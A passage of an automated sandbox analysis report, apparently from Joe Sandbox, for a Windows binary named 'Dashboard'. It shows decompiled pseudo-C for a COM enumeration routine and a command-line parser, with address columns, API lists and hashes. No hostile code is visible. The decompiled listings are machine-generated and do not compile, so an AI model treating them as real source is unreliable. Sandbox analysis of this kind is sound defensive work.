                                                                                                                    • Instruction Fuzzy Hash: 884144B090012DDBEB329F64CC44ADDBBB5AF49704F5044D9E289A3181DB754EC1DFA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E0100B61E(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				intOrPtr _t119;
                                                                                                                    				signed int _t121;
                                                                                                                    				intOrPtr* _t122;
                                                                                                                    				intOrPtr* _t126;
                                                                                                                    				signed int _t127;
                                                                                                                    				intOrPtr* _t130;
                                                                                                                    				signed int _t131;
                                                                                                                    				signed int _t133;
                                                                                                                    				signed int _t134;
                                                                                                                    				signed int _t137;
                                                                                                                    				signed int _t138;
                                                                                                                    				signed int _t140;
                                                                                                                    				signed int _t142;
                                                                                                                    				signed int _t143;
                                                                                                                    				signed int _t148;
                                                                                                                    				signed char _t152;
                                                                                                                    				signed int _t154;
                                                                                                                    				signed int _t155;
                                                                                                                    				signed int _t156;
                                                                                                                    				signed int _t159;
                                                                                                                    				intOrPtr _t161;
                                                                                                                    				intOrPtr* _t162;
                                                                                                                    				void* _t166;
                                                                                                                    				intOrPtr _t170;
                                                                                                                    				signed int _t173;
                                                                                                                    				intOrPtr _t174;
                                                                                                                    				intOrPtr* _t179;
                                                                                                                    				void* _t190;
                                                                                                                    				void* _t204;
                                                                                                                    				signed int _t206;
                                                                                                                    				signed int _t207;
                                                                                                                    				intOrPtr* _t209;
                                                                                                                    				void* _t210;
                                                                                                                    
                                                                                                                    				_t178 = __ebx;
                                                                                                                    				_push(0x30);
                                                                                                                    				E0100880F(E01015EDB, __ebx, __edi, __esi);
                                                                                                                    				_t204 = __ecx;
                                                                                                                    				_t119 =  *0x101a004; // 0x101a004
                                                                                                                    				if(_t119 != 0x101a004) {
                                                                                                                    					_t213 =  *(_t119 + 0x1c) & 0x00000008;
                                                                                                                    					if(( *(_t119 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    						_t4 = _t119 + 0x14; // 0x65637845
                                                                                                                    						_t5 = _t119 + 0x10; // 0x6c744143
                                                                                                                    						E010049DE(_t119,  *_t5,  *_t4, 0x46, 0x1001e2c);
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				_t206 = 0;
                                                                                                                    				 *((intOrPtr*)(_t210 - 0x30)) = 0;
                                                                                                                    				_push(_t210 - 0x30);
                                                                                                                    				 *(_t210 - 4) = 0;
                                                                                                                    				_t121 = E010096D9(_t178, _t204, _t204, 0, _t213);
                                                                                                                    				 *(_t210 - 0x20) = _t121;
                                                                                                                    				if(_t121 < 0) {
                                                                                                                    					L45:
                                                                                                                    					_t122 =  *((intOrPtr*)(_t210 - 0x30));
                                                                                                                    					 *(_t210 - 4) =  *(_t210 - 4) | 0xffffffff;
                                                                                                                    					if(_t122 != 0) {
                                                                                                                    						 *((intOrPtr*)( *_t122 + 8))(_t122);
                                                                                                                    					}
                                                                                                                    					return E010088FB( *(_t210 - 0x20));
                                                                                                                    				}
                                                                                                                    				_t126 =  *((intOrPtr*)(_t210 - 0x30));
                                                                                                                    				 *((intOrPtr*)(_t210 - 0x2c)) = 0;
                                                                                                                    				_t127 =  *((intOrPtr*)( *_t126 + 0x1c))(_t126, _t210 - 0x2c);
                                                                                                                    				 *(_t210 - 0x20) = _t127;
                                                                                                                    				if(_t127 < 0) {
                                                                                                                    					goto L45;
                                                                                                                    				}
                                                                                                                    				if( *((intOrPtr*)(_t210 - 0x2c)) > 0) {
                                                                                                                    					__eflags =  *(_t204 + 0x94);
                                                                                                                    					if( *(_t204 + 0x94) <= 0) {
                                                                                                                    						__eflags =  *((intOrPtr*)(_t210 - 0x2c)) - 1;
                                                                                                                    						 *(_t204 + 0x94) = 0;
                                                                                                                    						 *((intOrPtr*)(_t210 - 0x24)) = 1;
                                                                                                                    						if( *((intOrPtr*)(_t210 - 0x2c)) < 1) {
                                                                                                                    							goto L45;
                                                                                                                    						} else {
                                                                                                                    							_t179 = __imp__#6;
                                                                                                                    							while(1) {
                                                                                                                    								 *(_t210 - 0x18) = _t206;
                                                                                                                    								 *(_t210 - 0x1c) = _t206;
                                                                                                                    								 *(_t210 - 0x14) = _t206;
                                                                                                                    								_t130 =  *((intOrPtr*)(_t210 - 0x30));
                                                                                                                    								 *(_t210 - 4) = 3;
                                                                                                                    								_t131 =  *((intOrPtr*)( *_t130 + 0x20))(_t130,  *((intOrPtr*)(_t210 - 0x24)), _t210 - 0x18);
                                                                                                                    								__eflags = _t131 - _t206;
                                                                                                                    								 *(_t210 - 0x20) = _t131;
                                                                                                                    								if(_t131 < _t206) {
                                                                                                                    									break;
                                                                                                                    								}
                                                                                                                    								_t137 =  *(_t210 - 0x18);
                                                                                                                    								_t187 =  *_t137;
                                                                                                                    								_t138 =  *((intOrPtr*)( *_t137 + 0x1c))(_t137, _t210 - 0x14);
                                                                                                                    								__eflags = _t138 - _t206;
                                                                                                                    								 *(_t210 - 0x20) = _t138;
                                                                                                                    								if(_t138 < _t206) {
                                                                                                                    									break;
                                                                                                                    								}
                                                                                                                    								_t140 = E0100920F( *(_t210 - 0x18), _t210 - 0x1c);
                                                                                                                    								__eflags = _t140;
                                                                                                                    								if(_t140 < 0) {
                                                                                                                    									L31:
                                                                                                                    									 *_t179( *(_t210 - 0x14));
                                                                                                                    									_t142 =  *(_t210 - 0x1c);
                                                                                                                    									_t206 = 0;
                                                                                                                    									__eflags = _t142;
                                                                                                                    									 *(_t210 - 4) = 1;
                                                                                                                    									if(_t142 != 0) {
                                                                                                                    										 *((intOrPtr*)( *_t142 + 8))(_t142);
                                                                                                                    									}
                                                                                                                    									_t143 =  *(_t210 - 0x18);
                                                                                                                    									__eflags = _t143 - _t206;
                                                                                                                    									 *(_t210 - 4) = 0;
                                                                                                                    									if(_t143 != _t206) {
                                                                                                                    										 *((intOrPtr*)( *_t143 + 8))(_t143);
                                                                                                                    									}
                                                                                                                    									 *((intOrPtr*)(_t210 - 0x24)) =  *((intOrPtr*)(_t210 - 0x24)) + 1;
                                                                                                                    									__eflags =  *((intOrPtr*)(_t210 - 0x24)) -  *((intOrPtr*)(_t210 - 0x2c));
                                                                                                                    									if( *((intOrPtr*)(_t210 - 0x24)) <=  *((intOrPtr*)(_t210 - 0x2c))) {
                                                                                                                    										continue;
                                                                                                                    									} else {
                                                                                                                    										goto L45;
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    								_t190 = E0100ACC8(_t187);
                                                                                                                    								_t148 = E01014BC5(_t179, _t204, _t206, __eflags,  *(_t210 - 0x18));
                                                                                                                    								__eflags = _t148;
                                                                                                                    								if(_t148 != 0) {
                                                                                                                    									_t38 = _t204 + 0x98;
                                                                                                                    									 *_t38 =  *(_t204 + 0x98) + 1;
                                                                                                                    									__eflags =  *_t38;
                                                                                                                    								}
                                                                                                                    								_push( *(_t210 - 0x1c));
                                                                                                                    								 *(_t210 - 0xd) = 1;
                                                                                                                    								_t191 = E0100ACC8(_t190);
                                                                                                                    								_t207 = E010149BE(_t179, _t204, _t206, __eflags);
                                                                                                                    								__eflags = _t207;
                                                                                                                    								if(_t207 >= 0) {
                                                                                                                    									_t170 =  *0x101a004; // 0x101a004
                                                                                                                    									__eflags = _t170 - 0x101a004;
                                                                                                                    									if(_t170 != 0x101a004) {
                                                                                                                    										__eflags =  *(_t170 + 0x1c) & 0x00000008;
                                                                                                                    										if(( *(_t170 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    											_t46 = _t170 + 0x14; // 0x65637845
                                                                                                                    											_t47 = _t170 + 0x10; // 0x6c744143
                                                                                                                    											E010090EF( *_t47,  *_t46, 0x47, 0x1001e2c,  *((intOrPtr*)(_t210 - 0x24)));
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    									_t191 = E0100ACC8(_t191);
                                                                                                                    									_t173 = E010142AC(_t207, _t210 - 0xd);
                                                                                                                    									__eflags = _t173;
                                                                                                                    									if(_t173 >= 0) {
                                                                                                                    										_t174 =  *0x101a004; // 0x101a004
                                                                                                                    										__eflags = _t174 - 0x101a004;
                                                                                                                    										if(_t174 != 0x101a004) {
                                                                                                                    											__eflags =  *(_t174 + 0x1c) & 0x00000008;
                                                                                                                    											if(( *(_t174 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    												_t191 =  *(_t210 - 0xd) & 0x000000ff;
                                                                                                                    												_t54 = _t174 + 0x14; // 0x65637845
                                                                                                                    												_t55 = _t174 + 0x10; // 0x6c744143
                                                                                                                    												E010090BD( *_t55,  *_t54, 0x48, 0x1001e2c,  *((intOrPtr*)(_t210 - 0x24)),  *(_t210 - 0xd) & 0x000000ff);
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    								__eflags =  *(_t210 - 0xd);
                                                                                                                    								if( *(_t210 - 0xd) != 0) {
                                                                                                                    									_t152 = E01014AB0(E0100ACC8(_t191),  *(_t210 - 0x14));
                                                                                                                    									asm("sbb al, al");
                                                                                                                    									_t154 =  ~_t152 + 1;
                                                                                                                    									__eflags = _t154;
                                                                                                                    									 *(_t210 - 0xd) = _t154;
                                                                                                                    									if(_t154 == 0) {
                                                                                                                    										goto L31;
                                                                                                                    									}
                                                                                                                    									 *(_t210 - 0x28) =  *(_t210 - 0x28) & 0x00000000;
                                                                                                                    									_t155 =  *(_t210 - 0x1c);
                                                                                                                    									 *(_t210 - 4) = 4;
                                                                                                                    									_t156 =  *((intOrPtr*)( *_t155 + 0x48))(_t155, _t210 - 0x28);
                                                                                                                    									__eflags = _t156;
                                                                                                                    									 *(_t210 - 0x20) = _t156;
                                                                                                                    									if(_t156 < 0) {
                                                                                                                    										 *_t179( *(_t210 - 0x28));
                                                                                                                    										 *_t179( *(_t210 - 0x14));
                                                                                                                    										_t159 =  *(_t210 - 0x1c);
                                                                                                                    										__eflags = _t159;
                                                                                                                    										 *(_t210 - 4) = 1;
                                                                                                                    										if(_t159 != 0) {
                                                                                                                    											 *((intOrPtr*)( *_t159 + 8))(_t159);
                                                                                                                    										}
                                                                                                                    										_t134 =  *(_t210 - 0x18);
                                                                                                                    										__eflags = _t134;
                                                                                                                    										L43:
                                                                                                                    										 *(_t210 - 4) = 0;
                                                                                                                    										if(__eflags != 0) {
                                                                                                                    											 *((intOrPtr*)( *_t134 + 8))(_t134);
                                                                                                                    										}
                                                                                                                    										goto L45;
                                                                                                                    									}
                                                                                                                    									_t161 =  *0x101a004; // 0x101a004
                                                                                                                    									__eflags = _t161 - 0x101a004;
                                                                                                                    									if(_t161 != 0x101a004) {
                                                                                                                    										__eflags =  *(_t161 + 0x1c) & 0x00000008;
                                                                                                                    										if(( *(_t161 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    											_t70 = _t161 + 0x14; // 0x65637845
                                                                                                                    											_t71 = _t161 + 0x10; // 0x6c744143
                                                                                                                    											E01006C01( *_t71,  *_t70, 0x49, 0x1001e2c,  *(_t210 - 0x28));
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    									_t162 =  *((intOrPtr*)(_t204 + 0xd8));
                                                                                                                    									 *(_t210 - 0x34) =  *(_t210 - 0x28);
                                                                                                                    									 *((intOrPtr*)(_t210 - 0x3c)) = _t162;
                                                                                                                    									 *(_t210 - 0x38) =  *(_t210 - 0x14);
                                                                                                                    									_t209 =  *_t162 + 0x18;
                                                                                                                    									E0100ACC8( *(_t210 - 0x14));
                                                                                                                    									 *_t209( *((intOrPtr*)(_t210 - 0x3c)),  *(_t210 - 0x38),  *(_t210 - 0x34), E01014BC5(_t179, _t204, _t209, __eflags,  *(_t210 - 0x18)));
                                                                                                                    									_t166 = E01012DF3( *(_t210 - 0x14));
                                                                                                                    									E01013176(_t179, _t204 + 0xa4, _t204, _t209, __eflags);
                                                                                                                    									_t86 = _t204 + 0x94;
                                                                                                                    									 *_t86 =  *(_t204 + 0x94) + 1;
                                                                                                                    									__eflags =  *_t86;
                                                                                                                    									 *_t179( *(_t210 - 0x28),  *(_t210 - 0x14), _t166, 0,  *0x100207c);
                                                                                                                    								}
                                                                                                                    								goto L31;
                                                                                                                    							}
                                                                                                                    							 *_t179( *(_t210 - 0x14));
                                                                                                                    							_t133 =  *(_t210 - 0x1c);
                                                                                                                    							__eflags = _t133 - _t206;
                                                                                                                    							 *(_t210 - 4) = 1;
                                                                                                                    							if(_t133 != _t206) {
                                                                                                                    								 *((intOrPtr*)( *_t133 + 8))(_t133);
                                                                                                                    							}
                                                                                                                    							_t134 =  *(_t210 - 0x18);
                                                                                                                    							__eflags = _t134 - _t206;
                                                                                                                    							goto L43;
                                                                                                                    						}
                                                                                                                    					} else {
                                                                                                                    						 *(_t210 - 0x20) = 1;
                                                                                                                    						goto L45;
                                                                                                                    					}
                                                                                                                    				} else {
                                                                                                                    					 *(_t210 - 0x20) = 0x8000ffff;
                                                                                                                    					goto L45;
                                                                                                                    				}
                                                                                                                    			}




































                                                                                                                    0x0100b61e
                                                                                                                    0x0100b61e
                                                                                                                    0x0100b625
                                                                                                                    0x0100b62a
                                                                                                                    0x0100b62c
                                                                                                                    0x0100b636
                                                                                                                    0x0100b638
                                                                                                                    0x0100b63c
                                                                                                                    0x0100b645
                                                                                                                    0x0100b648
                                                                                                                    0x0100b64b
                                                                                                                    0x0100b64b
                                                                                                                    0x0100b63c
                                                                                                                    0x0100b650
                                                                                                                    0x0100b652
                                                                                                                    0x0100b658
                                                                                                                    0x0100b65b
                                                                                                                    0x0100b65e
                                                                                                                    0x0100b665
                                                                                                                    0x0100b668
                                                                                                                    0x0100b908
                                                                                                                    0x0100b908
                                                                                                                    0x0100b90b
                                                                                                                    0x0100b911
                                                                                                                    0x0100b916
                                                                                                                    0x0100b916
                                                                                                                    0x0100b921
                                                                                                                    0x0100b921
                                                                                                                    0x0100b66e
                                                                                                                    0x0100b675
                                                                                                                    0x0100b67b
                                                                                                                    0x0100b680
                                                                                                                    0x0100b683
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100b68c
                                                                                                                    0x0100b69a
                                                                                                                    0x0100b6a0
                                                                                                                    0x0100b6b1
                                                                                                                    0x0100b6b4
                                                                                                                    0x0100b6ba
                                                                                                                    0x0100b6bd
                                                                                                                    0x00000000
                                                                                                                    0x0100b6c3
                                                                                                                    0x0100b6c3
                                                                                                                    0x0100b6c9
                                                                                                                    0x0100b6c9
                                                                                                                    0x0100b6cc
                                                                                                                    0x0100b6cf
                                                                                                                    0x0100b6d2
                                                                                                                    0x0100b6de
                                                                                                                    0x0100b6e3
                                                                                                                    0x0100b6e6
                                                                                                                    0x0100b6e8
                                                                                                                    0x0100b6eb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100b6f1
                                                                                                                    0x0100b6f4
                                                                                                                    0x0100b6fb
                                                                                                                    0x0100b6fe
                                                                                                                    0x0100b700
                                                                                                                    0x0100b703
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100b710
                                                                                                                    0x0100b715
                                                                                                                    0x0100b717
                                                                                                                    0x0100b885
                                                                                                                    0x0100b888
                                                                                                                    0x0100b88a
                                                                                                                    0x0100b88d
                                                                                                                    0x0100b88f
                                                                                                                    0x0100b891
                                                                                                                    0x0100b895
                                                                                                                    0x0100b89a
                                                                                                                    0x0100b89a
                                                                                                                    0x0100b89d
                                                                                                                    0x0100b8a0
                                                                                                                    0x0100b8a2
                                                                                                                    0x0100b8a6
                                                                                                                    0x0100b8ab
                                                                                                                    0x0100b8ab
                                                                                                                    0x0100b8ae
                                                                                                                    0x0100b8b4
                                                                                                                    0x0100b8b7
                                                                                                                    0x00000000
                                                                                                                    0x0100b8bd
                                                                                                                    0x00000000
                                                                                                                    0x0100b8bd
                                                                                                                    0x0100b8b7
                                                                                                                    0x0100b725
                                                                                                                    0x0100b727
                                                                                                                    0x0100b72c
                                                                                                                    0x0100b72e
                                                                                                                    0x0100b730
                                                                                                                    0x0100b730
                                                                                                                    0x0100b730
                                                                                                                    0x0100b730
                                                                                                                    0x0100b736
                                                                                                                    0x0100b739
                                                                                                                    0x0100b742
                                                                                                                    0x0100b749
                                                                                                                    0x0100b74b
                                                                                                                    0x0100b74d
                                                                                                                    0x0100b74f
                                                                                                                    0x0100b754
                                                                                                                    0x0100b759
                                                                                                                    0x0100b75b
                                                                                                                    0x0100b75f
                                                                                                                    0x0100b76b
                                                                                                                    0x0100b76e
                                                                                                                    0x0100b771
                                                                                                                    0x0100b771
                                                                                                                    0x0100b75f
                                                                                                                    0x0100b780
                                                                                                                    0x0100b782
                                                                                                                    0x0100b787
                                                                                                                    0x0100b789
                                                                                                                    0x0100b78b
                                                                                                                    0x0100b790
                                                                                                                    0x0100b795
                                                                                                                    0x0100b797
                                                                                                                    0x0100b79b
                                                                                                                    0x0100b79d
                                                                                                                    0x0100b7ac
                                                                                                                    0x0100b7af
                                                                                                                    0x0100b7b2
                                                                                                                    0x0100b7b2
                                                                                                                    0x0100b79b
                                                                                                                    0x0100b795
                                                                                                                    0x0100b789
                                                                                                                    0x0100b7b7
                                                                                                                    0x0100b7bb
                                                                                                                    0x0100b7cb
                                                                                                                    0x0100b7d2
                                                                                                                    0x0100b7d4
                                                                                                                    0x0100b7d4
                                                                                                                    0x0100b7d6
                                                                                                                    0x0100b7d9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100b7df
                                                                                                                    0x0100b7e3
                                                                                                                    0x0100b7ed
                                                                                                                    0x0100b7f1
                                                                                                                    0x0100b7f4
                                                                                                                    0x0100b7f6
                                                                                                                    0x0100b7f9
                                                                                                                    0x0100b8df
                                                                                                                    0x0100b8e4
                                                                                                                    0x0100b8e6
                                                                                                                    0x0100b8e9
                                                                                                                    0x0100b8eb
                                                                                                                    0x0100b8ef
                                                                                                                    0x0100b8f4
                                                                                                                    0x0100b8f4
                                                                                                                    0x0100b8f7
                                                                                                                    0x0100b8fa
                                                                                                                    0x0100b8fc
                                                                                                                    0x0100b8fc
                                                                                                                    0x0100b900
                                                                                                                    0x0100b905
                                                                                                                    0x0100b905
                                                                                                                    0x00000000
                                                                                                                    0x0100b900
                                                                                                                    0x0100b7ff
                                                                                                                    0x0100b804
                                                                                                                    0x0100b809
                                                                                                                    0x0100b80b
                                                                                                                    0x0100b80f
                                                                                                                    0x0100b81b
                                                                                                                    0x0100b81e
                                                                                                                    0x0100b821
                                                                                                                    0x0100b821
                                                                                                                    0x0100b80f
                                                                                                                    0x0100b829
                                                                                                                    0x0100b834
                                                                                                                    0x0100b83a
                                                                                                                    0x0100b83d
                                                                                                                    0x0100b840
                                                                                                                    0x0100b843
                                                                                                                    0x0100b859
                                                                                                                    0x0100b85e
                                                                                                                    0x0100b875
                                                                                                                    0x0100b87d
                                                                                                                    0x0100b87d
                                                                                                                    0x0100b87d
                                                                                                                    0x0100b883
                                                                                                                    0x0100b883
                                                                                                                    0x00000000
                                                                                                                    0x0100b7bb
                                                                                                                    0x0100b8c2
                                                                                                                    0x0100b8c4
                                                                                                                    0x0100b8c7
                                                                                                                    0x0100b8c9
                                                                                                                    0x0100b8cd
                                                                                                                    0x0100b8d2
                                                                                                                    0x0100b8d2
                                                                                                                    0x0100b8d5
                                                                                                                    0x0100b8d8
                                                                                                                    0x00000000
                                                                                                                    0x0100b8d8
                                                                                                                    0x0100b6a2
                                                                                                                    0x0100b6a2
                                                                                                                    0x00000000
                                                                                                                    0x0100b6a2
                                                                                                                    0x0100b68e
                                                                                                                    0x0100b68e
                                                                                                                    0x00000000
                                                                                                                    0x0100b68e

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 0100B625
                                                                                                                      • Part of subcall function 010049DE: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 010049F3
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0100B888
                                                                                                                      • Part of subcall function 0100ACC8: EnterCriticalSection.KERNEL32(0101A968), ref: 0100ACDE
                                                                                                                      • Part of subcall function 0100ACC8: LeaveCriticalSection.KERNEL32(0101A968), ref: 0100ACFB
                                                                                                                      • Part of subcall function 01014BC5: __EH_prolog3.LIBCMT ref: 01014BCC
                                                                                                                      • Part of subcall function 01014BC5: VariantInit.OLEAUT32(?), ref: 01014BFE
                                                                                                                      • Part of subcall function 01014BC5: VariantClear.OLEAUT32(?), ref: 01014C47
                                                                                                                      • Part of subcall function 01014BC5: VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 01014C56
                                                                                                                      • Part of subcall function 01014BC5: SysStringLen.OLEAUT32(?), ref: 01014C6E
                                                                                                                      • Part of subcall function 01014BC5: SysFreeString.OLEAUT32(?), ref: 01014C7F
                                                                                                                      • Part of subcall function 01014BC5: VariantClear.OLEAUT32(?), ref: 01014C89
                                                                                                                    • SysFreeString.OLEAUT32 ref: 0100B883
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0100B8C2
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0100B8DF
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0100B8E4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Free$Variant$ClearCriticalH_prolog3Section$ChangeEnterInitLeaveMessageTraceType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2015058421-0
                                                                                                                    • Opcode ID: 4d7cddfe775398383c88e6911047bbf7a5b6bb33b1ea23626f0e8af9ac970301
                                                                                                                    • Instruction ID: baaabb00d1101bfc5f673f8e96fd8f20d2257b82d0e0d4b1ae0f655628e2b70b
                                                                                                                    • Opcode Fuzzy Hash: 4d7cddfe775398383c88e6911047bbf7a5b6bb33b1ea23626f0e8af9ac970301
                                                                                                                    • Instruction Fuzzy Hash: 31A12D74E0025AEFEF16DFA8C984AEDBBB5BF48300F144499E584F72A1C7799941CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E01006656(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				short* _t53;
                                                                                                                    				short* _t64;
                                                                                                                    				intOrPtr _t70;
                                                                                                                    				short* _t72;
                                                                                                                    				void* _t75;
                                                                                                                    				short* _t77;
                                                                                                                    				void* _t81;
                                                                                                                    				void* _t94;
                                                                                                                    				void* _t100;
                                                                                                                    				void* _t103;
                                                                                                                    				void* _t105;
                                                                                                                    				void* _t108;
                                                                                                                    				void* _t110;
                                                                                                                    				void* _t113;
                                                                                                                    				void* _t114;
                                                                                                                    				short* _t115;
                                                                                                                    
                                                                                                                    				_t108 = __edx;
                                                                                                                    				_push(0x14);
                                                                                                                    				E0100880F(E01015B67, __ebx, __edi, __esi);
                                                                                                                    				_t110 = __ecx;
                                                                                                                    				 *(_t114 - 0x1c) = 0;
                                                                                                                    				E01004D33(_t114 - 0x10, 0x101a5f0);
                                                                                                                    				 *((intOrPtr*)(_t114 - 4)) = 0;
                                                                                                                    				E01004D33(_t114 - 0x14, 0x101a5f0);
                                                                                                                    				 *((char*)(_t114 - 4)) = 1;
                                                                                                                    				if( *(_t114 + 8) != 0) {
                                                                                                                    					_t113 = CommandLineToArgvW( *(_t114 + 8), _t114 - 0x1c);
                                                                                                                    					__eflags = _t113;
                                                                                                                    					if(_t113 == 0) {
                                                                                                                    						_t53 = GetLastError();
                                                                                                                    						__eflags = _t53;
                                                                                                                    						if(_t53 > 0) {
                                                                                                                    							_t53 = _t53 & 0x0000ffff | 0x80070000;
                                                                                                                    							__eflags = _t53;
                                                                                                                    						}
                                                                                                                    						 *(_t114 + 8) = _t53;
                                                                                                                    					} else {
                                                                                                                    						E0100628E(_t114 - 0x14, __ecx,  *_t113);
                                                                                                                    						_t94 = _t110 + 0x10;
                                                                                                                    						E010061C3(0, _t94, _t114 - 0x14);
                                                                                                                    						_push( *((intOrPtr*)(_t114 + 0xc)));
                                                                                                                    						_push(_t94);
                                                                                                                    						 *(_t114 + 8) = _t115;
                                                                                                                    						E01005E50(_t115, __eflags, _t114 - 0x14);
                                                                                                                    						_t64 = E010063ED(0, _t110, _t108, _t110, _t113, __eflags);
                                                                                                                    						__eflags = _t64;
                                                                                                                    						 *(_t114 + 8) = _t64;
                                                                                                                    						if(_t64 >= 0) {
                                                                                                                    							__eflags =  *(_t114 - 0x1c) - 1;
                                                                                                                    							 *(_t114 - 0x18) = 1;
                                                                                                                    							if( *(_t114 - 0x1c) > 1) {
                                                                                                                    								do {
                                                                                                                    									E0100628E(_t114 - 0x10, _t110,  *((intOrPtr*)(_t113 +  *(_t114 - 0x18) * 4)));
                                                                                                                    									_t70 =  *((intOrPtr*)(_t114 - 0x10));
                                                                                                                    									__eflags =  *(_t70 - 0xc);
                                                                                                                    									if( *(_t70 - 0xc) <= 0) {
                                                                                                                    										goto L12;
                                                                                                                    									} else {
                                                                                                                    										_t72 = E01004CF1(_t114 - 0x10, 0x1001790, 0);
                                                                                                                    										__eflags = _t72;
                                                                                                                    										if(_t72 == 0) {
                                                                                                                    											L10:
                                                                                                                    											E010061C3(0x1001794, _t114 - 0x14, _t114 - 0x10);
                                                                                                                    											_push( *((intOrPtr*)(_t114 + 0xc)));
                                                                                                                    											_t100 = _t114 - 0x10;
                                                                                                                    											_t75 = E01005FD7(_t100, 0x1001794);
                                                                                                                    											_push(_t100);
                                                                                                                    											 *(_t114 + 8) = _t115;
                                                                                                                    											E01005FBB(_t115, _t75);
                                                                                                                    											_t77 = E010063ED(0x1001794, _t110, _t108, _t110, _t113, __eflags);
                                                                                                                    										} else {
                                                                                                                    											_t103 = _t114 - 0x10;
                                                                                                                    											__eflags = E01004CF1(_t103, 0x100178c, 0);
                                                                                                                    											if(__eflags == 0) {
                                                                                                                    												goto L10;
                                                                                                                    											} else {
                                                                                                                    												_push(_t103);
                                                                                                                    												 *(_t114 + 8) = _t115;
                                                                                                                    												E01005E50(_t115, __eflags, _t114 - 0x10);
                                                                                                                    												_t105 = _t114 - 0x14;
                                                                                                                    												 *((char*)(_t114 - 4)) = 2;
                                                                                                                    												_t81 = E01005FD7(_t105, 0x1001794);
                                                                                                                    												_push(_t105);
                                                                                                                    												 *(_t114 - 0x20) = _t115;
                                                                                                                    												E01005FBB(_t115, _t81);
                                                                                                                    												 *((char*)(_t114 - 4)) = 1;
                                                                                                                    												_t77 = E010065DE(0x1001794, _t110, _t108, _t110, _t113, __eflags);
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    										__eflags = _t77;
                                                                                                                    										 *(_t114 + 8) = _t77;
                                                                                                                    										if(_t77 >= 0) {
                                                                                                                    											goto L12;
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    									goto L13;
                                                                                                                    									L12:
                                                                                                                    									 *(_t114 - 0x18) =  *(_t114 - 0x18) + 1;
                                                                                                                    									__eflags =  *(_t114 - 0x18) -  *(_t114 - 0x1c);
                                                                                                                    								} while ( *(_t114 - 0x18) <  *(_t114 - 0x1c));
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L13:
                                                                                                                    						LocalFree(_t113);
                                                                                                                    					}
                                                                                                                    				} else {
                                                                                                                    					 *(_t114 + 8) = 0x80070057;
                                                                                                                    				}
                                                                                                                    				E01004925( *((intOrPtr*)(_t114 - 0x14)) + 0xfffffff0, _t108);
                                                                                                                    				E01004925( *((intOrPtr*)(_t114 - 0x10)) + 0xfffffff0, _t108);
                                                                                                                    				return E010088FB( *(_t114 + 8));
                                                                                                                    			}



















                                                                                                                    0x01006656
                                                                                                                    0x01006656
                                                                                                                    0x0100665d
                                                                                                                    0x01006662
                                                                                                                    0x0100666f
                                                                                                                    0x01006672
                                                                                                                    0x0100667b
                                                                                                                    0x0100667e
                                                                                                                    0x01006686
                                                                                                                    0x0100668a
                                                                                                                    0x010066a5
                                                                                                                    0x010066a7
                                                                                                                    0x010066a9
                                                                                                                    0x010067bd
                                                                                                                    0x010067c3
                                                                                                                    0x010067c5
                                                                                                                    0x010067cc
                                                                                                                    0x010067cc
                                                                                                                    0x010067cc
                                                                                                                    0x010067d1
                                                                                                                    0x010066af
                                                                                                                    0x010066b4
                                                                                                                    0x010066bc
                                                                                                                    0x010066c0
                                                                                                                    0x010066c5
                                                                                                                    0x010066cb
                                                                                                                    0x010066cc
                                                                                                                    0x010066d2
                                                                                                                    0x010066d9
                                                                                                                    0x010066de
                                                                                                                    0x010066e0
                                                                                                                    0x010066e3
                                                                                                                    0x010066ec
                                                                                                                    0x010066ef
                                                                                                                    0x010066f2
                                                                                                                    0x010066fd
                                                                                                                    0x01006706
                                                                                                                    0x0100670b
                                                                                                                    0x0100670e
                                                                                                                    0x01006712
                                                                                                                    0x00000000
                                                                                                                    0x01006718
                                                                                                                    0x01006722
                                                                                                                    0x01006727
                                                                                                                    0x01006729
                                                                                                                    0x01006773
                                                                                                                    0x0100677a
                                                                                                                    0x0100677f
                                                                                                                    0x01006782
                                                                                                                    0x01006786
                                                                                                                    0x0100678b
                                                                                                                    0x0100678e
                                                                                                                    0x01006792
                                                                                                                    0x01006799
                                                                                                                    0x0100672b
                                                                                                                    0x01006732
